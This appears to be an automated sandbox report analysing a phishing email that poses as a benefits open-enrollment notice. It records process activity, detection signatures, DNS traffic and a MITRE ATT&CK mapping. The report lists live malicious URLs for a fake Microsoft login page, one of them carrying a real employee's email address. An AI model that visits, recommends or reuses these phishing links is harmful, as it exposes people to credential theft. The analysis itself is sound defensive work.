
Windows Analysis Report
44zg1cvu.msg

Overview

General Information

Sample name: 44zg1cvu.msg (renamed because original name is a hash value)
Original sample name: FW BENEFITS OPEN ENROLLMENT 2024-2025 - PLEASE READ for Scott-electric Friday 28th of June 2024 m144zg1cvu.msg
Analysis ID: 1466358
MD5: 42b3b3e14a1c514a7647e2916c6f4cb5
SHA1: b4db942f9d4ab74ee0c488433f083d273fad0c86
SHA256: e66b870ef3fa0efb51d0912366587a5c2033a7b582088bac6e899c2cf366e897

Detection

HTMLPhisher
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page
Snort IDS alert for network traffic
Yara detected HtmlPhish54
Performs DNS queries to domains with low reputation
Detected hidden input values containing email addresses (often used in phishing pages)
Found iframes
HTML body contains low number of good links
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Queries the volume information (name, serial number etc) of a device
Sigma detected: Office Autorun Keys Modification
Sigma detected: Outlook Security Settings Updated - Registry
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 3964 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\44zg1cvu.msg" MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 5752 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "94A4268F-64A9-402B-9D26-050228D3257E" "68CA683E-662B-479C-A333-B79E6B1D0F4B" "3964" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6808 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RKD4N0TN\LLZ-950309.htm MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 7000 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1968,i,10276406539543630318,17323566579801720130,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
      • chrome.exe (PID: 7324 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4616 --field-trial-handle=1968,i,10276406539543630318,17323566579801720130,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 83395EAB5B03DEA9720F8D7AC0D15CAA)
  • cleanup
Source         Rule                      Description                 Author        Strings
0.2.pages.csv  JoeSecurity_HtmlPhish_54  Yara detected HtmlPhish_54  Joe Security
2.3.pages.csv  JoeSecurity_HtmlPhish_54  Yara detected HtmlPhish_54  Joe Security
2.5.pages.csv  JoeSecurity_HtmlPhish_54  Yara detected HtmlPhish_54  Joe Security
0.2.pages.csv  JoeSecurity_HtmlPhish_54  Yara detected HtmlPhish_54  Joe Security
2.3.pages.csv  JoeSecurity_HtmlPhish_54  Yara detected HtmlPhish_54  Joe Security
            Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 3964, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1
            Source: Registry Key set, Author: frack113: Data: Details: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RKD4N0TN\, EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 3964, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Security\OutlookSecureTempFolder
            Timestamp: 07/02/24-20:22:04.124310
            SID: 2857090
            Source Port: 443
            Destination Port: 49720
            Protocol: TCP
            Classtype: A Network Trojan was detected


            Phishing

            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz' is highly suspicious. The domain name is not associated with Microsoft, which is the brand identified in the image. The legitimate domain for Microsoft is 'microsoft.com'. The presence of a prominent login form asking for a password without a CAPTCHA and the use of a misleading domain name are strong indicators of phishing. Social engineering techniques are evident as the page mimics the legitimate Microsoft login page to deceive users into entering their credentials. DOM: 2.6.pages.csv
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz' is highly suspicious due to its random string subdomain and the '.xyz' top-level domain, which is often used in phishing attacks. The webpage mimics Microsoft's login page, which is a common target for phishing. The presence of a prominent login form asking for a password without a captcha further raises suspicion. The legitimate domain for Microsoft is 'microsoft.com', and this URL does not match it. Additionally, the link for 'Forgot my password' and 'Sign in with another account' could be used to mislead users into providing their credentials. DOM: 4.7.pages.csv
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz LLM: Score: 9 brands: Microsoft Reasons: The URL 'https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz' is highly suspicious due to its random string and unusual domain extension (.xyz), which is often used in phishing attacks. The page mimics a Microsoft login page, which is a common target for phishing. The presence of a prominent login form asking for a password without a CAPTCHA increases the risk. The legitimate domain for Microsoft is 'microsoft.com', and this URL does not match it. The use of social engineering techniques is evident as the page attempts to trick the user into entering their password by displaying a message about an incorrect password. Based on these factors, the site is determined to be a phishing site. DOM: 4.11.pages.csv
            Source: Yara match File source: 0.2.pages.csv, type: HTML
            Source: Yara match File source: 2.3.pages.csv, type: HTML
            Source: Yara match File source: 2.5.pages.csv, type: HTML
            Source: Yara match File source: 2.6.pages.csv, type: HTML
            Source: Yara match File source: 4.8.pages.csv, type: HTML
            Source: Yara match File source: 4.7.pages.csv, type: HTML
            Source: Yara match File source: 4.9.pages.csv, type: HTML
            Source: Yara match File source: 4.10.pages.csv, type: HTML
            Source: Yara match File source: 4.11.pages.csv, type: HTML
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=true HTTP Parser: melodi@scott-electric.com
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=true HTTP Parser: Iframe src: https://f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/Prefetch/Prefetch.aspx
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/login HTTP Parser: Iframe src: https://f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/Prefetch/Prefetch.aspx
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=true HTTP Parser: Number of links: 0
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/login HTTP Parser: Number of links: 0
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: Number of links: 0
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com HTTP Parser: Base64 decoded: a[href="http://www.salidzini.lv/"][style="display: block; width: 120px; height: 40px; overflow: hidden; position: relative;"]
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=true HTTP Parser: Title: Sign in to your account does not match URL
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/login HTTP Parser: Title: Sign in to your account does not match URL
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: Title: Microsoft Online Password Reset does not match URL
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=true HTTP Parser: <input type="password" .../> found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/login HTTP Parser: <input type="password" .../> found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com HTTP Parser: No favicon
            Source: https://f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/Prefetch/Prefetch.aspx HTTP Parser: No favicon
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=true HTTP Parser: No <meta name="author".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/login HTTP Parser: No <meta name="author".. found
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: No <meta name="author".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=true HTTP Parser: No <meta name="copyright".. found
            Source: https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/login HTTP Parser: No <meta name="copyright".. found
            Source: https://288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?ru=https%3a%2f%2fonline.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz%2fcommon%2freprocess%3fctx%3drQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuASYnjUkdz1qcmpUS4jSD905fRWjMmEj9C8wMr5gZJzEJJmbmpOfkulQnJxfUqKbmpOaXFKUmQxScotJ0L8o3TMlvNgtNSW1KLEkMz_vETNu9RdYBF6x8BgwW3FwcAkwSDAoMPxgYVzECnThp24vduH1ot57E6O9TDsmMZxi1Q91yjGISI7IDjP3MClMz_I1jczONAuyCDb3yPKqckvRjvL3DsqKjEoJKfa0NbEynMAmNIGN6RQbwwc2lg52hlnsDAc4GQ_wMvzgO3avY9W-G8veebzi13H28bUoDC4v9U4NztA39wvOSDIId_U2TTJJ9oyyyAv1KAzLSQ4OdK8ILHO03SDA8ECAAQA1&mkt=en-US&hosted=0&device_platform=Windows+10&username=melodi%40scott-electric.comHTTP Parser: No <meta name="copyright".. found
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe Directory created: C:\Program Files\Google\Chrome\Application\Dictionaries
            Source: unknown HTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.17:49707 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.17:49709 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.17:49712 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.17:49760 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49764 version: TLS 1.2
            Source: unknown HTTPS traffic detected: 2.23.209.148:443 -> 192.168.2.17:49765 version: TLS 1.2
            Source: chrome.exe Memory has grown: Private usage: 1MB later: 32MB

            Networking

            Source: Traffic Snort IDS: 2857090 ETPRO CURRENT_EVENTS JS/PsyduckPockeball Payload Inbound 51.38.145.13:443 -> 192.168.2.17:49720
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe DNS query: online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe DNS query: a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe DNS query: a14bf615-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe DNS query: l1ve.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe DNS query: f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe DNS query: 371098e6-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe DNS query: 288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe DNS query: 2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: C:\Program Files\Google\Chrome\Application\chrome.exe DNS query: 78d704d5-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.200
            Source: unknown TCP traffic detected without corresponding DNS query: 20.190.159.4
            Source: unknown TCP traffic detected without corresponding DNS query: 40.127.169.103
            Source: global trafficDNS traffic detected: DNS query: online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: a14bf615-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: l1ve.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: 371098e6-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: 288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: 2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: global trafficDNS traffic detected: DNS query: 78d704d5-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz
            Source: unknownHTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.17:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.17:49709 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 20.190.159.4:443 -> 192.168.2.17:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.17:49760 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49764 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 2.23.209.148:443 -> 192.168.2.17:49765 version: TLS 1.2
            Source: classification engineClassification label: mal68.phis.troj.winMSG@20/67@28/148
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240702T1421470122-3964.etl
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
            Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\44zg1cvu.msg"
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "94A4268F-64A9-402B-9D26-050228D3257E" "68CA683E-662B-479C-A333-B79E6B1D0F4B" "3964" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\RKD4N0TN\LLZ-950309.htm
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1968,i,10276406539543630318,17323566579801720130,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4616 --field-trial-handle=1968,i,10276406539543630318,17323566579801720130,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE File Volume queried: C:\Windows\SysWOW64 FullSizeInformation
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Process information queried: ProcessInformation
            Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Queries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
            Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server
            Initial Access: 1 Drive-by Compromise; Default Accounts; Domain Accounts; Local Accounts
            Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron
            Persistence: 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; Logon Script (Windows); Login Hook
            Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; 1 Extra Window Memory Injection
            Defense Evasion: 3 Masquerading; 1 Process Injection; 1 DLL Side-Loading; 1 Extra Window Memory Injection
            Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS
            Discovery: 1 Process Discovery; 1 File and Directory Discovery; 13 System Information Discovery; System Network Configuration Discovery
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
            Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
            Command and Control: 2 Encrypted Channel; 1 Non-Application Layer Protocol; 2 Application Layer Protocol; Protocol Impersonation
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction

            No Antivirus matches
Source | Detection | Scanner | Label | Link
file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/RKD4N0TN/LLZ-950309.htm | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz | 51.38.145.13 | true | true | | unknown
288682c1-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz | 51.38.145.13 | true | true | | unknown
a638d5a3-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz | 51.38.145.13 | true | true | | unknown
www.google.com | 142.250.184.228 | true | false | | unknown
78d704d5-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz | 51.38.145.13 | true | true | | unknown
online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz | 51.38.145.13 | true | true | | unknown
2ac4b5bb-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz | 51.38.145.13 | true | true | | unknown
a14bf615-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz | 51.38.145.13 | true | true | | unknown
371098e6-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz | 51.38.145.13 | true | true | | unknown
l1ve.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz | 51.38.145.13 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com | true | | unknown
https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/?zNUB6o=7wM0&username=melodi%40scott-electric.com&sso_reload=true | true | | unknown
file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/RKD4N0TN/LLZ-950309.htm | false | Avira URL Cloud: safe | unknown
https://f0ec7674-83151dbc.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/Prefetch/Prefetch.aspx | false | | unknown
https://online.msjdfkm2jfjqk8bqylav5rrbg2uhuksp5d.xyz/common/login | true | | unknown
